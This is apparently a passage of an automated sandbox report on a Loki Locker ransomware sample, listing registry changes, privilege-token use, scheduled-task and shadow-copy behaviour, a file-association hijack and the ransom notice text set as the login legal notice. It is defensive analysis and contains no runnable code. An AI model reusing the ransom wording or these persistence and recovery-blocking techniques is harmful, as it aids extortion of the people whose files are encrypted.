| Set value (int) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "16000" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).right = "1216" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656} | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "MS-1033-110-WINMO-DNN" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "spell=NativeSupported; cardinal=GlobalSupported; ordinal=NativeSupported; date=GlobalSupported; time=GlobalSupported; telephone=NativeSupported; currency=NativeSupported; url=NativeSupported; address=NativeSupported; alphanumeric=NativeSupported; message=NativeSupported; computer=NativeSupported" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "Microsoft Speech Recognition Engine - es-ES Embedded DNN v11.1" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "CC" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "11.0" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.html\ = "NotSoCleverBotFile" | C:\Windows\SysWOW64\cmd.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "{37A9D401-0BF5-4366-9530-C75C6DC23EC9}" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\TTS\\de-DE\\M1031Hedda" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\TTS\\en-US\\MSTTSLocenUS.dat" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "German Phone Converter" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\it-IT-N\\tn1040.bin" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "Microsoft David - English (United States)" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).y = "4294967295" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "5223743" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\AI043082" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\it-IT-N\\c1040.fe" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 0400000003000000020000000100000000000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\CortanaVoices\\Tokens\\MSTTS_V110_enUS_EvaM" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "Microsoft Cosimo" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\SniffedFolderType = "Documents" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\7\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHost_ = 6801000088020000 | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "- 0001 ! 0002 & 0003 , 0004 . 0005 ? 0006 _ 0007 1 0008 ~ 0009 aa 000a a 000b oh 000c ax 000d b 000e d 000f eh 0010 ey 0011 f 0012 g 0013 hy 0014 uy 0015 iy 0016 k 0017 l 0018 m 0019 n 001a ng 001b nj 001c oe 001d eu 001e ow 001f p 0020 r 0021 s 0022 sh 0023 t 0024 uw 0025 v 0026 w 0027 y 0028 z 0029 zh 002a" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\System32\Notepad.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\sdiagnhost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\winlogon.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\winlogon.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Encrypted by Loki locker" | C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your files have been encrypted due to a security problem with your computer\r\nIf you want to restore them, write us to the e-mail: [email protected]\r\nWrite this ID in the title of your message: 9FF76E0A\r\nIn case of no answer in 24 hours write us to this e-mail: [email protected]" | C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe | N/A |
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://bazaar.abuse.ch/browse.php?search=tag%3Alocker
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2ec,0x318,0x7ffb3574f208,0x7ffb3574f214,0x7ffb3574f220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1860,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=2184 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2160,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=2152 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2572,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=2580 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3504,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3524,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5068,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5084 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
